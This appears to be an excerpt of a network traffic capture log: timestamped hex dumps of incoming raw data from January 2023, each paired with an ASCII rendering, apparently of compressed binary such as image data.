                                                                                                                                                                                    2023-01-05 07:58:11 UTC8411INData Raw: 53 1e 19 4c aa 4b 92 b2 ed 37 21 6e 14 10 d6 5b 0b 0b df b5 eb 9b 8b 12 4f 73 29 cb c1 be 35 a8 e4 1f 68 f0 b8 ec 6c 4c 9c bc 9c ec ac cc 84 49 56 08 f1 e4 54 8c 4a c5 a3 51 21 21 58 d8 1d c4 1d 2f d0 69 5d 97 92 b7 af 53 5e 2e 1d 21 6e 22 64 78 16 4f 33 91 37 1b 8f 94 f1 cd 06 64 d1 cd 14 f0 37 bb fb 61 0a c9 1c db 01 dd fe a4 21 6e 05 86 bd 6a ab d3 1e 18 d6 5b fb 8c 56 c1 ba cd 2e 88 e2 f9 7e 0d c9 fb f1 e4 71 32 63 21 5b aa a4 ee cb 23 83 d9 ae 2d d3 e3 a7 4a 3f e5 71 55 35 64 fe c3 0d aa d3 d0 ec bc 66 3e 4f 07 1c 32 4f 36 37 24 72 55 63 fd b4 3b d8 a1 1a ee 24 a8 56 37 d0 a8 36 e9 7b 57 27 2e cc d5 9a 38 35 55 c7 52 55 f8 ae 62 66 19 f1 47 1a 42 2f 0c 07 14 95 24 e8 c4 6d d0 06 3a 7a f7 b9 e9 55 55 5a 8b 47 af 72 77 ad 72 2d 0c 8c fc 37 1d 91 3c d8
                                                                                                                                                                                    Data Ascii: SLK7!n[Os)5hlLIVTJQ!!X/i]S^.!n"dxO37d7a!nj[V.~q2c![#-J?qU5df>O2O67$rUc;$V76{W'.85URUbfGB/$m:zUUZGrwr-7<
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8427INData Raw: 2c 6e 43 8d 3e 1d 3e 15 6e 3f 65 78 e6 2c 52 bd de bf e9 fb cd 2a 60 70 47 10 61 67 71 ed 33 05 23 76 f5 1d 7d 01 0d d3 b7 cb 5b d5 94 f6 db d3 a3 5f 12 ff 00 f9 6a 47 46 56 79 3f 13 c1 72 38 49 87 e2 fc 54 7c 7c fb d4 cb 23 90 ea e8 01 1b 6c a1 08 26 e0 e8 74 b5 4e be df 79 fa de 84 b2 fb f2 7a 51 19 ee 33 83 cc e2 df df c1 9a 08 32 04 6e 89 2a 47 29 64 2e 08 de a4 cb 7b 8b dc 7f 2d ed 75 36 b5 43 fe 21 2e e4 3f e7 9c 7e 5f bc ef ff 00 6e 7e ec 72 7e 17 87 2e 07 2d 26 4f 2c f2 cd ef 7b d9 39 17 91 01 55 0c 88 fb 77 2a 36 d1 f4 86 f5 f5 ab 3f e3 23 b9 46 7f 78 79 23 aa 34 d3 fd f4 e4 e4 e3 e4 e2 d2 25 51 2e e5 62 cf 21 ba 9b fd 3b 43 01 6b 69 d3 5e f5 3b 7b 72 ea 9e a4 71 fb 92 6d 6f 4e 3e f3 82 f1 dc b7 3d c5 49 2b 63 66 33 c6 43 0c 75 6c 89 87 b2 c4 a9
                                                                                                                                                                                    Data Ascii: ,nC>>n?ex,R*`pGagq3#v}[_jGFVy?r8IT||#l&tNyzQ32n*G)d.{-u6C!.?~_n~r~.-&O,{9Uw*6?#Fxy#4%Q.b!;Cki^;{rqmoN>=I+cf3Cul
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8443INData Raw: 97 be ec fd bb 3e 01 e5 43 c7 f8 64 90 60 e5 22 cb 88 a7 ea d1 b4 28 0f 7d ad a0 ef 6b 57 8a f7 ff 00 69 f4 33 a5 4e 96 d5 7c 4d 7c 2c ce ea 5f 54 f5 3e 8c 78 6f 07 97 c5 70 1c 6f 15 93 21 59 e0 c4 8a 39 00 be 8c ab a8 d7 5d 0e 95 f4 9e 0d 76 63 aa 7d 92 39 99 e2 d7 6d 77 66 91 b1 a5 dc 7f a8 74 ec 46 95 ae 4a 76 08 6c 39 c9 d2 52 47 a0 ed 43 62 55 61 1c 4c 8b dc c9 eb de 92 b0 6c 64 76 c3 97 fd 7a 7c cd 4e 43 60 0e 34 a3 40 fa fa 91 d6 a2 27 56 21 a1 99 7e 9d c0 9b 6b a5 34 42 1a 19 d9 20 3a 6d 3d b7 11 ad 36 1d 44 34 72 03 62 07 a8 b6 9a 91 4d 31 31 3b 76 fd 44 0b 9f 8f 7a 62 f8 88 3b af a0 3f 83 50 02 41 24 7d 3b be 40 ff 00 c2 90 48 37 b2 d9 48 7d a6 fa 5f a7 f0 a2 03 70 7e e6 db 9b 39 be 9f 1f ee a0 4d 88 f7 00 06 c1 81 bd ad 7e b4 44 00 da 92 41 b6
                                                                                                                                                                                    Data Ascii: >Cd`"(}kWi3N|M|,_T>xopo!Y9]vc}9mwftFJvl9RGCbUaLldvz|NC`4@'V!~k4B :m=6D4rbM11;vDzb;?PA$};@H7H}_p~9M~DA
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8451INData Raw: b6 f9 3d 4e 25 f9 52 da b7 da b4 fb 7b 1d 97 82 e5 df 0f 17 fd bb 9c 93 0e 19 31 63 b9 31 64 87 50 9d 89 12 04 74 03 fe 60 45 bf 98 d6 ea db 6e 96 68 ce de ed 54 c3 2f 71 39 bc 1c e6 d9 87 95 0c d2 2a 6e 09 1b a3 92 bf ea b0 27 4f 8f 4a b1 5d 74 4c 83 9f 32 c1 b3 e2 3a b3 02 7f b7 c2 a7 02 77 50 2d 33 23 e8 5a f6 d7 5d 29 c0 f7 20 93 32 39 2e 11 86 87 53 7b 5a 93 43 56 1e 5c c1 7b df 41 a6 a0 0d 7e 14 a0 5e a4 b1 b1 96 a0 7d 47 ea fe dd 29 a4 45 d8 03 35 01 23 5b 5b a9 a2 06 ac 32 f9 8a 80 9b 8f 9e bf dd 4c 5b a0 48 cf 4e 80 8d d6 bd 02 57 0c 65 a0 d1 98 16 1a e8 28 1d 5c 80 e4 a1 6e b7 ef 6a 70 27 60 0c b5 26 cb 70 7d 74 a4 d0 d5 b7 74 1b 7c c4 d1 49 3b 81 f4 22 99 09 11 fb b0 cd 60 6e 3b 8b 51 02 6f 50 a4 cd 40 3e a3 f5 1e 80 8a 70 27 61 a1 9f 10 00 33
                                                                                                                                                                                    Data Ascii: =N%R{1c1dPt`EnhT/q9*n'OJ]tL2:wP-3#Z]) 29.S{ZCV\{A~^}G)E5#[[2L[HNWe(\njp'`&p}tt|I;"`n;QoP@>p'a3
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8467INData Raw: 24 b3 89 47 60 21 04 00 80 9f aa ec 48 ff 00 49 ae a7 1b 9d 9f 04 3b bd 3a 44 7e 23 ba f5 28 f4 f2 30 bf 72 bc 5f 0b 8a e5 13 c8 d7 f6 90 f2 53 aa e5 45 1c 4b 1b 63 3e d6 20 80 84 91 d4 6a 8c a3 b6 9a d7 43 8d cb cd 4b 27 b6 6a ff 00 8e 86 4a e5 ab ab ab e9 d1 f8 a3 99 fd be e6 38 ec 0f 2d 83 9a e5 96 5c 3c 61 33 cb 34 7c 76 e0 de dd 89 64 87 ea dc 2e 34 b6 eb 81 7d 6b d3 70 b2 a5 92 5e 9e 48 d5 9e fb f1 46 9d 34 fe 53 e6 76 1f 2e f1 6f 16 f3 f9 97 90 fb 51 9f 84 dc cf 2b 96 aa dc 3c 32 34 60 63 88 f7 10 db c2 ef 6d cb 76 b1 b1 26 c0 b7 5a eb 72 38 f8 f3 b6 f1 bd 7c 0e 65 32 5f 8e a7 22 70 97 5f 39 39 9f 8b 7d af ff 00 79 ff 00 78 c1 e6 39 4c 4e 1f 3f 8e 89 9e 2c 6c d6 58 64 92 4b fd 2a 03 b0 0a 3d 49 27 a8 ae 4e 0e 2d 72 27 ba d0 d7 63 46 5e 53 aa ab 4b
                                                                                                                                                                                    Data Ascii: $G`!HI;:D~#(0r_SEKc> jCK'jJ8-\<a34|vd.4}kp^HF4Sv.oQ+<24`cmv&Zr8|e2_"p_99}yx9LN?,lXdK*=I'N-r'cF^SK
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8483INData Raw: 4a 5f f3 12 75 eb 6d 29 ba c0 f7 48 8d 2c 7f be 94 09 b1 24 83 d3 4f 5a 92 a2 21 ea 30 f6 93 d3 51 4b 61 35 60 ad 7b 0b 69 43 a8 4e a3 82 d7 db 55 d9 16 27 23 80 8a 45 80 dd 7f c6 93 42 6c 22 4d aa 3b 47 21 10 0e ad 44 0a 41 b7 bd cf c6 94 04 86 2e 3a d8 fc e8 80 56 16 40 3f 49 b8 a1 54 5b 87 36 b5 fe 93 af c6 93 a3 1a b4 0b 45 61 ad af 51 d8 c7 23 e1 00 d3 51 51 78 d8 d5 d2 1f 4b ad f5 bd 57 b1 96 6e 43 9d 7b 5c 7a d2 55 64 6c d0 01 23 a7 7a 6b 1c 8b 70 bf 9d 2d 82 76 05 ae 09 36 f5 a5 b0 92 02 9b 68 3a 9a 5b 60 94 f7 1c 24 b6 82 dd fd 28 78 e4 8e f0 bb 6d 3d 3f e1 47 a4 87 bc 40 3e 97 b6 95 1d 90 34 c2 1d 6d 7b d2 80 ee 24 8e fd be 14 a0 52 24 82 7b 9a 7b 49 ba f7 1a 60 4e 96 04 7c a8 da 21 bb 75 b8 3f 85 0e a4 91 1a 40 5b d6 de 95 1d a2 96 47 11 0b fe
                                                                                                                                                                                    Data Ascii: J_um)H,$OZ!0QKa5`{iCNU'#EBl"M;G!DA.:V@?IT[6EaQ#QQxKWnC{\zUdl#zkp-v6h:[`$(xm=?G@>4m{$R${{I`N|!u?@[G
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8490INData Raw: a4 5e fa 11 ad 3d cc 5b 50 82 fa dc 8d 46 96 a4 ec 27 54 20 dd 48 0d 75 3d 85 af a7 ad 29 63 75 d4 64 4c 4f 46 d7 d0 e9 4d 5c 56 aa 14 5d 89 3d 2d 63 de 9e ed 44 d2 68 32 d6 1a 1b 8f 87 fe 14 2b 77 42 d8 bc 04 96 b8 de bf 33 7b 54 b7 c8 96 28 72 c5 ee b7 42 3b 8d 2a 2d f8 12 55 12 d2 11 62 4d 35 78 07 51 40 df 53 6d 35 ed 52 dc 47 62 12 0d fa 7f 0a 15 88 ba 07 ba c3 53 f8 53 de 35 51 25 81 26 f4 dd c1 d4 17 b8 f8 54 77 0e 20 6d 8f ce 84 ca f6 0a 27 f9 b4 b1 ed 52 91 c4 0a 07 a1 bd 45 b2 55 41 a9 bf 5a 8b 26 91 e9 5f fb 7d f0 b6 e4 33 8f 95 e4 00 21 c5 3b 50 11 7d c4 dc 1b 7c cf f0 bf ad 78 cf dd 5e e1 b5 7a 35 eb dc fb 1f fd 6b ec 33 ff 00 f5 97 f8 53 f9 b3 47 e6 1c cb 79 67 92 b4 20 91 c5 f1 d2 7b 7b fa 86 93 75 8b 5b bd 98 69 ff 00 90 1d 2b c6 e1 a2 55
                                                                                                                                                                                    Data Ascii: ^=[PF'T Hu=)cudLOFM\V]=-cDh2+wB3{T(rB;*-UbM5xQ@Sm5RGbSS5Q%&Tw m'REUAZ&_}3!;P}|x^z5k3SGyg {{u[i+U
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8506INData Raw: dc 99 39 ee 8b ae 3b 9e e6 38 f9 11 06 44 eb b0 96 09 2f d4 37 1d 2f 66 d6 e3 e7 54 e4 c3 5b 23 5d 39 17 ab 94 cb dc af 24 cd 5c 0c b7 e4 23 0f 2b 63 e4 2b 4b b8 8e 88 7a 8b 6a 74 16 d6 d7 aa eb 8b ea 50 4b 3f 21 ec b4 f5 83 94 fd cd 07 1b c4 7c 4f 0c f5 6c 79 e6 fc 09 50 2b 67 1b f3 33 cb 7b d3 8c 54 f8 1c 38 8b 7c eb 6c 9e 6a 48 b3 0f ac 7a 0a 06 aa 5c f1 5c 8e 47 0d 95 17 29 80 c5 27 85 83 29 ff 00 03 f0 3d 0d 42 f5 dd a3 2f c1 99 e1 b2 b2 3d 56 65 c5 f3 9e 22 2e 5b 0a cb 2b 75 50 75 8e 60 3e a5 3f 03 da b9 af e8 70 7b 6c 59 6b 9a 8a e8 e6 b9 11 b6 e6 88 8b 3f 5d a7 b3 0e bf 9d 5c 46 c8 97 1b 6d 55 04 dc 74 34 48 21 e2 37 1b 8e a6 a5 d8 b0 0d 66 fa 87 5a 48 75 21 90 fb ca f5 8d 86 9f 03 e9 44 90 81 c7 4d e5 58 93 75 b1 b8 ea 08 ee 2a 56 d5 12 66 d3 8e
                                                                                                                                                                                    Data Ascii: 9;8D/7/fT[#]9$\#+c+KzjtPK?!|OlyP+g3{T8|ljHz\\G)')=B/=Ve".[+uPu`>?p{lYk?]\FmUt4H!7fZHu!DMXu*Vf
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8522INData Raw: 68 c3 a2 82 39 1e a9 95 91 4d be c0 f4 02 d4 d5 4b 11 59 cf f0 4b e4 98 72 62 b4 82 39 51 0b c5 71 70 ce 35 0a 4f 6b 8e 87 f0 ae 9f b4 72 bf 4f 92 67 46 79 2f de 1e d5 ff 00 23 c5 74 4a 5a d5 78 9e 64 c8 bc 2c 62 97 46 52 41 04 77 af a4 d5 ab a9 47 e6 7c f8 de 2b 3a db aa d0 67 dd 00 f5 d4 54 ca 1b 0f dd 1d 41 bd 26 84 ac 24 9b 8e be b4 c7 22 37 de ca 0d 10 01 13 d5 97 af 7d 69 08 48 93 69 fa 85 ea 4d 0f 74 05 ee 0b fa 54 5d 46 ac 03 ad bd 29 6d 22 15 b7 11 db a7 5a 1e 84 a6 44 b1 d9 fa 4e 87 bd 34 84 dc 09 73 6e b6 06 9c 03 b4 05 7b 0d 34 f5 a6 90 6f 19 67 dc 6c b7 f9 54 5a 0d e2 9f 41 d6 f4 0d b1 92 4f ae 94 c8 85 bc 0b f4 d4 d0 91 27 71 0a 17 f4 9d 3e 46 94 11 dd 01 90 7f 97 ad 0d 0d 5a 02 fa 87 43 4a 09 56 e2 8b b6 eb d8 1a 36 f7 1e f7 d0 56 f5 b6 83
                                                                                                                                                                                    Data Ascii: h9MKYKrb9Qqp5OkrOgFy/#tJZxd,bFRAwG|+:gTA&$"7}iHiMtT]F)m"ZDN4sn{4oglTZAO'q>FZCJV6V
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8530INData Raw: 49 bf c8 b1 b7 fd 3a 91 39 4d e8 49 21 e4 db 33 9d 01 b1 d8 35 ec 41 1f fd 69 03 4f fe 96 bd 8d 4d 32 2c 44 d8 91 e3 82 14 2d 97 5b f5 52 a4 75 3e ab 61 df aa 0f 57 a7 65 a9 5a 23 15 64 00 d9 b6 82 41 f5 b1 24 5a fe b7 b8 bf fa bd c6 fe 51 52 a8 35 25 8e 13 91 ff 00 b6 27 49 35 53 6d 37 00 08 d3 e2 2d a7 ff 00 9b 5f 5a 9d 51 07 a3 92 c9 e1 f6 e2 46 9f fe 94 c8 56 fe 9b 6e 2c 4f fc b6 37 3f e9 0e df cc 2a 2e b0 35 7d c6 37 cc 62 f7 f8 e9 97 6a b3 c7 67 6d da 31 0a c0 9b 7c 6e 6e 7f f3 30 fe 4a ec fe db c9 b3 97 5f 39 5f 71 e3 bf ec 1e 3f ad ed 99 23 fb 61 fd e7 14 d1 8e ef a4 e8 2f db ae a2 f7 1a 1a fa e7 43 f2 bd ba 91 58 ec 60 ca 41 5d 40 f8 8b 1f 5e df da f5 0d b2 46 7b 06 06 83 73 1b 38 dd d3 a1 f8 ff 00 7e 94 9e ba 48 dd 63 51 a7 62 db 5a 56 16 22 c4
                                                                                                                                                                                    Data Ascii: I:9MI!35AiOM2,D-[Ru>aWeZ#dA$ZQR5%'I5Sm7-_ZQFVn,O7?*.5}7bjgm1|nn0J_9_q?#a/CX`A]@^F{s8~HcQbZV"
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8546INData Raw: 8b f4 fe 1f db fb 74 a4 32 9f c9 f8 f9 79 9e 2f 27 8b c7 45 77 9d 44 76 26 d6 b9 06 ff 00 81 17 ad be df c9 fd 3e 5a df c1 9c 7f 7e e0 fe bb 8d 7c 31 2d ad 3e 27 8b 26 8a 4c 69 1b 1b 24 6d 96 36 28 c0 fa 83 63 5f 5e c7 91 5d 6e 5d cf c9 59 f8 b6 e3 dd d2 dd 53 86 30 cd d3 4b 6a 75 eb 53 46 76 b4 08 36 81 4f e1 49 a0 5a 05 ee 0e c7 fe 34 08 48 bf 55 fc cd 4a 60 84 4b 15 ba da 31 04 7a 74 a8 93 e8 85 0d 6e 5a f6 f8 d0 45 58 76 e3 b6 b6 d2 82 9b 58 90 00 16 bf fe 14 98 2d 18 e9 2a 6d 6e bd 2a 01 76 2f 75 ba 9f 85 03 84 26 f7 3b 93 f8 d0 56 d4 0a 46 fe 1d a8 22 a5 8b b8 07 a5 87 5b d4 1a d4 b6 ac 7c 90 c2 fd 6f d2 80 5a a0 2b 0d 0d b5 14 93 1d 82 76 dc 2e ba 7c 29 20 62 f6 9d 58 02 0f 72 28 4c 18 ad bb 87 51 d2 8e a0 28 31 8c 05 24 1f ef a4 c9 d5 c0 e7 d2 fa
                                                                                                                                                                                    Data Ascii: t2y/'EwDv&>Z~|1->'&Li$m6(c_^]n]YS0KjuSFv6OIZ4HUJ`K1ztnZEXvX-*mn*v/u&;VF"[|oZ+v.|) bXr(LQ(1$
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8562INData Raw: c9 b8 e4 31 86 52 18 98 7d 0e 08 f4 aa d1 a6 f5 9e a5 6a 48 f2 44 1e 71 79 e3 fe 94 b6 3f cd 6d 1b ff 00 52 eb f3 d2 bd 27 b1 73 36 59 e3 7d fa 1f 37 fd ed ed 3e ae 3f 5e ab 5a e9 6f 87 60 c1 36 36 ea 08 ed f9 57 ac 93 e5 4a 07 b4 6b 05 ef da 8d c4 18 3d 9b 68 06 9d 3a 75 a1 b2 33 a0 02 6c bb 01 73 df 5a 8b b0 57 c0 26 5d a7 ea 1a 74 f9 53 4c 7b 83 53 61 d4 8b 77 bf 4a 18 4c 84 cd 71 b9 4d a9 cc 12 a2 92 2c 8b 63 70 2e 0d b4 27 bd 34 8b 55 60 3f 70 dc db 41 6b 52 63 48 77 79 22 f7 37 1d 6a 2c b1 50 f6 c7 fd b4 f8 52 c1 8d 3f 97 f2 70 7d 52 28 fd b4 8c 05 b6 a9 60 6d f1 b8 fc 2b e7 9f ba fd c7 75 fd 15 db a9 f7 6f fa db d8 ff 00 4f 85 f2 6e b5 b7 4f 81 eb a4 8d d6 34 dc 3f af 2f d4 2f d8 0e f5 e4 15 61 79 b3 e9 db a5 f9 22 6e 3a 80 cc e6 de da 00 1d bb b1
                                                                                                                                                                                    Data Ascii: 1R}jHDqy?mR's6Y}7>?^Zo`66WJk=h:u3lsZW&]tSL{SawJLqM,cp.'4U`?pAkRcHwy"7j,PR?p}R(`m+uoOnO4?//ay"n:
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8570INData Raw: d0 ef 39 73 b6 d9 09 61 6b c6 9d 23 0d 72 54 58 33 5e d6 ae 46 6c 96 e4 65 d9 4a c5 27 58 fe e8 f1 25 5a ee 89 ea c3 f3 3f b6 3e 41 f6 bf 1f 89 e0 3c ab 0b 7e 2f 38 1b 33 07 91 b5 9f de b2 fb 82 cc 03 58 2d b7 2b 1f ab a8 ad d9 e8 f1 d1 e4 b6 89 76 0c 8d 36 fc 51 79 f6 6f fe eb 7c 87 ed 36 2f 33 f6 d2 29 64 8f 0f 2d fd c8 5f 70 0f 14 c8 6c c5 5e df 4a c8 a2 c4 2d ba 0d 6b af c5 bb b6 24 d3 99 5f 89 66 5c ff 00 46 df 0f c0 f2 bf dc 6e 62 4f 24 e5 73 3c b7 25 a4 c9 e4 e6 9c cf 93 23 31 97 7a 9d 0b 33 1f e6 1a 7f 61 57 59 b7 6d af 44 fa 78 c9 8f 1b 9d 19 3b c0 78 c4 e4 24 cb c4 c7 91 86 16 64 1b a4 44 8b dd 7b 03 d8 5c 01 6b f5 37 03 d2 f5 cb e7 e5 ba 49 25 36 ab f1 82 da fd 47 7b 93 c2 bc 73 ed ce 06 4c fe 27 8b 34 f9 d8 58 d0 36 56 4c 8e 1d e4 92 47 21 e3
                                                                                                                                                                                    Data Ascii: 9sak#rTX3^FleJ'X%Z?>A<~/83X-+v6Qyo|6/3)d-_pl^J-k$_f\FnbO$s<%#1z3aWYmDx;x$dD{\k7I%6G{sL'4X6VLG!
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8586INData Raw: 1f 43 f8 8a d4 9c a9 29 88 23 c8 37 59 c6 8c a4 11 6a 60 d1 10 48 d1 cc 88 d6 db 22 90 6d fe b5 f8 fc 45 38 d0 43 e6 31 3c 65 7b f5 53 fc 2a 0c 93 d4 8b 1b 34 a7 63 f5 1a db e2 3a d4 a4 82 72 09 51 42 7d 7a a2 36 f1 f2 3d 7f 8d 04 b6 a2 6e 3c 21 2d 24 7a 9d bb 35 f4 06 e3 fc a8 63 5a 0f cb 08 73 62 35 63 b8 7c 36 ff 00 c2 a1 d0 71 a1 b5 f1 cc 58 52 2c d7 e4 64 68 22 9f 8d c8 31 90 00 59 24 05 6c a0 b7 4d 05 cd b5 6b 6d 1f aa b3 66 bc b5 b7 c7 52 13 b6 77 7c 8c ce 57 1b 3f 13 95 2e 1e 5d a2 ca 84 23 32 31 07 6e f5 de a3 e6 01 17 f4 37 bd 68 ad d5 94 a3 3d db ab 86 2a 08 c4 8c b8 f9 43 fa 52 31 4d e7 42 7b 91 7f 5b 10 69 ee 82 dd f0 e0 b8 f1 24 9e 5e 53 1b 17 1a 23 95 32 cc bf d3 09 bf 72 03 ad d6 c4 5a da 9b 8b 0e a7 a5 61 f7 3c d5 c5 86 d6 b3 85 0e 1f 4d
                                                                                                                                                                                    Data Ascii: C)#7Yj`H"mE8C1<e{S*4c:rQB}z6=n<!-$z5cZsb5c|6qXR,dh"1Y$lMkmfRw|W?.]#21n7h=*CR1MB{[i$^S#2rZa<M
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8602INData Raw: 3e 25 9c ff 00 a6 90 ba f5 93 1b e0 71 f2 9c 36 1f 37 cc 73 8d 1c b9 fc b6 1e 5e 31 78 a6 82 4b 43 34 45 8c 90 ea c5 1d cd 91 da cd fd 32 dd 2f 7a d5 c8 be 34 d2 aa d1 35 3a 6b d4 c1 c6 e2 c5 1d af d6 1c 7f 53 01 e3 3e 3f e5 fc 87 1c 60 e4 71 4c 00 e7 a4 d8 f9 e8 56 34 49 56 09 5b 6c 4a a7 61 0e 3f 55 87 d3 65 e9 d0 ef e4 e7 c3 55 b9 3d 1f 6f 99 8f 8d c7 c9 bb d4 7a 68 74 3e 2f 9b ce 1c 7f 17 ca be 4e 4e 4b c0 cc 8d 1c 62 55 d8 b1 c9 fa 5d c8 68 89 bb 81 fa 4b 16 16 da cb 7a e6 e3 c5 55 76 aa a3 ce 7c 7c 8e b2 7b 52 4d b7 3d 91 be f1 8f dd 73 b3 ff 00 bf 70 be 3f fb 82 50 24 bb b2 59 e7 c6 93 79 62 c4 58 48 b6 d8 1b dc b7 72 05 4b 93 5a d6 b1 77 fe 27 62 ae b8 d2 6a 91 a7 7e e6 a6 4c ac bc 69 b8 8e 07 23 1e 1e 3f 97 c3 59 72 1b 22 7e 45 0b 31 9c df 1a 15
                                                                                                                                                                                    Data Ascii: >%q67s^1xKC4E2/z45:kS>?`qLV4IV[lJa?UeU=ozht>/NNKbU]hKzUv||{RM=sp?P$YybXHrKZw'bj~Li#?Yr"~E1
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8610INData Raw: 0c 5e 15 df ab 83 bf db b7 b2 2e d2 0d 14 05 ef ab 36 e5 4a aa b7 93 af 65 d1 fd de 3d 8a aa db bc 53 a4 1d ff 00 c7 b8 dc 2c 08 8e 6f 93 73 b9 59 f9 19 38 02 6c 48 b8 e8 11 b1 a7 9d a7 0b ec c5 12 85 44 2e ad a3 95 53 77 7d da 5a fc 8e 4b 76 fc b5 49 27 2e 66 52 8e e6 ea e2 b6 35 bd da 6b 13 03 f9 f9 9c 94 1c 5f 27 e3 dc e3 e6 f1 dc 82 f1 d2 bb 64 71 cc 1e 7f dc c7 30 45 86 55 09 fd 38 ca 07 4d aa 41 32 7f 51 9b 60 02 b2 71 f9 4a 96 ab a4 34 ec b4 7a 68 d4 e9 de 7b fd c6 6b 72 2d 56 ea ba 75 f3 8f 23 1f f6 c7 33 3f 2e 29 79 c5 c3 93 1b 8a 1e df 1d 38 92 53 2c 93 c7 05 fe a0 ed f5 97 67 37 66 ba a3 05 db d2 b7 fb bb ad be 9a bd 5e a9 ae 8a 4d b8 7d d5 65 ae c7 a4 3e ee 4e 91 e4 9e 55 e2 6f 93 07 2d c9 66 a4 cf 1e 0a c4 c2 68 bd b9 16 79 63 58 a4 43 18 0c
                                                                                                                                                                                    Data Ascii: ^.6Je=S,osY8lHD.Sw}ZKvI'.fR5k_'dq0EU8MA2Q`qJ4zh{kr-Vu#3?.)y8S,g7f^M}e>NUo-fhycXC
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8626INData Raw: 6f 4e db ad d9 36 ff 00 f1 8f ea 1c 9a de ce 2d a2 6e 11 1f c3 7e d3 66 47 ca e6 62 e6 64 ab 71 18 d2 b3 93 97 1c 9b a6 89 41 44 44 58 f4 b9 61 b1 75 b3 5b e9 de 05 57 ee 1e e3 5b a5 6a f8 4f c1 f8 b3 2e 3a 7d 4d 55 ee 89 d3 cc b1 e6 3c 3f 3f c9 f9 2c 6e 2f 92 ce 48 f1 9b 35 d1 b2 e5 8c 46 03 17 da eb b9 80 04 b3 05 0a df cb 18 0a ab 71 6a e7 e1 e4 6d 4d aa ea 97 8e 8d f8 fc bc 08 5f 8f 7c d5 97 a3 4b ef 3a e7 98 e3 73 9c 2e 76 3f 8a 70 98 ef 87 e3 8b 1e 4e 16 4c 39 3b 19 cc 3e c8 92 79 e4 64 66 63 29 8a 37 de d7 21 15 d6 35 1b eb 89 ed 98 28 dd f2 59 a7 76 ff 00 34 f8 3e 95 5d 12 5a 1c bc f8 36 44 bf ab ee 3e 7c 73 09 22 4b 85 97 cc 23 3e 36 3b 49 06 4c 25 6c de d3 1d 4c 41 c6 d1 20 56 36 6d 4a b6 bb 6d 5f 46 e2 5a a9 35 5e f0 fe 62 c6 9d 5b 47 42 fb 6f
                                                                                                                                                                                    Data Ascii: oN6-n~fGbdqADDXau[W[jO.:}MU<??,n/H5FqjmM_|K:s.v?pNL9;>ydfc)7!5(Yv4>]Z6D>|s"K#>6;IL%lLA V6mJm_FZ5^b[GBo
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8642INData Raw: cb c7 af fb 55 4f 57 f7 f7 2a fd 4b 69 3b 24 fb 1b 5f 11 f1 6f 1c cc c3 c3 80 66 49 8f 21 c8 89 12 3c 88 a3 20 ca ee 2d ee 02 2c 49 4b 08 93 ff 00 51 b7 4a c7 fa fc fe b6 db d6 67 59 af 43 2d da c9 33 a7 c0 a3 e4 82 f1 9c d6 7f 87 73 f9 79 10 60 96 9f 02 6c 4e b2 40 51 c8 40 0b 14 52 a8 40 37 27 4b 7d 22 ba b8 ea aa d3 8e 8e 63 cd 9b 70 e6 b5 5a dd aa 5d 0a 5f 16 f1 78 8e 4c 83 c9 cc 2b 87 63 27 1d 99 22 98 ce 5b a9 dc 44 81 1b eb 9a cd 68 d1 4a ef dd d4 0a d1 c9 cd bd 6d c5 3e 6b fa 1d 1c f1 9f 13 ad 6a b7 2e 9e 2c e9 1e 2f 39 f1 e4 cd 87 8d c8 58 59 1e 3c d4 c5 91 3d cf 72 68 0f bd 0a b0 27 db 3b 24 64 08 0e ed 5e e4 1d a4 8e 53 b2 ab 57 e9 2e 3e 07 2e 99 7d 3f a5 93 f9 3c 3e 43 ca f1 67 f3 ff 00 2a ca c2 8b 94 5c cc 9e 59 32 79 0c 86 74 9f 28 15 59 23
                                                                                                                                                                                    Data Ascii: UOW*Ki;$_ofI!< -,IKQJgYC-3sy`lN@Q@R@7'K}"cpZ]_xL+c'"[DhJm>kj.,/9XY<=rh';$d^SW.>.}?<>Cg*\Y2yt(Y#
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8649INData Raw: 48 d3 3a 28 a1 0a 4c 8e 09 0e 9f 4d ba 31 21 89 02 e6 b9 36 f7 f4 a8 ed 7a b5 e1 fd 20 c7 9b 3c ca d6 66 11 ce bc 4f cc 78 ef 15 c9 cb f0 6e 4e 3c 93 1b b8 9e 1c e6 77 12 25 c2 ab 2b 16 5e e4 0d ac 34 00 7e 59 6b ee 6e d8 5d ac 9a eb 0b fb 9f c3 e2 6a 51 4c 69 a7 af 73 4e 7e eb 70 92 4e e7 8b c2 93 1b 01 e6 48 5b 3f 91 24 ab cc a7 db 3e c4 23 61 95 88 d3 ea 64 5b 8b b3 6b 5d 0c 5c ba aa ad b5 fa 9d 75 af 5d bf 16 47 e8 d6 35 d3 53 0a 7c d3 c9 bc 9d 25 3f 6e 51 a7 8c e4 7e de 38 e5 82 3c 78 cb 24 87 70 69 6f b1 56 d6 16 57 27 51 b9 b5 b5 67 79 6d 8a e9 64 70 9f 5f f0 1e 1a 5e d7 75 af 47 31 fc 81 9b ff 00 68 19 fc ee 5e 7f 37 f7 37 94 e4 63 cd 61 29 c1 e3 78 ac 69 39 2d f6 8f dc 65 fd f1 22 05 58 c9 fe a5 b7 38 50 c4 8b d6 c7 ee 95 e3 56 31 d6 75 ed df e2
                                                                                                                                                                                    Data Ascii: H:(LM1!6z <fOxnN<w%+^4~Ykn]jQLisN~pNH[?$>#ad[k]\u]G5S|%?nQ~8<x$pioVW'Qgymdp_^uG1h^77ca)xi9-e"X8PV1u
